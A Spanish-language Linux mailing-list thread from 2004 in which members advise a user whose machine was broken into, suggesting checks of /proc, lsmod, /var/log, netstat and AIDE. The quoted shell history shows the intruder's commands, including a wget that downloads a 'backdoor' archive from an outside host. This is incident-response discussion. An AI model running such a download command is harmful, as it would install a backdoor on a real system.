Buenas,
Antes de nada saludos a la lista que es la primera vez que posteo.
A rengl�n seguido, puedes probar a mirar en /proc los n�meros de
proceso. Los directorios que son numeros, son los identificadores de los
procesos que hay. Puedes acceder a ellos y con un simple cat ver datos sobre
ese proceso.
Adem�s puedes comprobar si con lsmod observas alg�n m�dulo extra�o.
Si lo ha hecho bien, que lo dudo, si ha troyanizado el sistema no aparecer�.
Pero igual suena la campana y lo pillas.
Observa los logs en /var/log para ver si puedes recabar m�s info
sobre el tipo que te ha entrado.
Mira tambien que no haya en tu home otros hist�ricos de otros
interpretes (que se suele hacer para dejar las menos huellas posibles).
Con netstat -vaptn podr�s observar (repito que siempre y cuando no
est� bien troyanizado el sistema) los procesos que escuchan cada puerto.
Y como punto final, la pr�xima vez usa algo como Aide para hacer una
imagen del sistema intacta y comparar en caso de que creas que ha habido una
intrusi�n.
Un saludo a todos/as,
I�aki R.
-----Mensaje original-----
De: SoTaNeZ [mailto:[EMAIL PROTECTED]
Enviado el: viernes, 20 de febrero de 2004 16:40
Para: [email protected]
Asunto: Re: Fui atacado]
==> nada de fecha 18 de febrero en el syslog. Luego hice un history y me
==> aparecio esto que por su puesto yo no lo hice(m�s raro aun):
==>
==> 484 cat /etc/issue
==> 485 ps
==> 486 bash
==> 487 /usr/sbin:/sbin:/usr/bin:/bin:/lib/security/.config/bin
==> 488 netstat -a
==> 489 cd /lib/security/.config/bin
==> 490 cd /lib/security/.config
==> 491 dir
==> 492 cd ssh
==> 493 dir
==> 494 cd ..
==> 495 wget http://www.gwydiondylan.org/downloads/binaries/linux/x86 496
==> /tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
==> 497 wget
==>
http://www.gwydiondylan.org/downloads/binaries/linux/x86/tar/gwydion-dylan-2
.3.10-x86-linux.tar.gz
==> 498 wget geocities.com/s3rjiu/backdoor/ser.tar.gz
==>
==> Esto paquete porsuesto no los baje.
Parece que se han colado en tu ordenador y se han bajado un backdoor de esos
(y no ha borrado el historial, animalito). Pues yo me ir�a para empezar a la
pagina de la que se ha bajado el backdoor, para ver que es lo que hace, y
conectate a internet lo menos posible, y pon un firewall que bloquee
practicamente todo menos lo necesario. Mira los servicios abiertos a
internet y el kernel, a ver que vulnerabilidades tienen. Tambi�n te puedes
bajar el manual an�lisis forense en linux o algo as� que esta en
es.tldp.org. Y si quieres una lista mejorcita pues apuntate a la lista
hackindex (busca en google la web).
==>
==> Ah hago un ps y no sale nada, me dice esto:
==> Violaci�n de segmento
Vaya, eso igual lo ha echo el troyano.
No soy ning�n experto, asi que no puedo ayudar m�s, saludos.
==> Cual es la inseguridad que tengo?
==>
==> Gracias y saludos......
==>
==> --
==> Federico Contreras
==> T.S.U. en Inform�tica
==> U.D.O.
==>
--
"No hay nada peor que ser vulgar"
[EMAIL PROTECTED]
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]
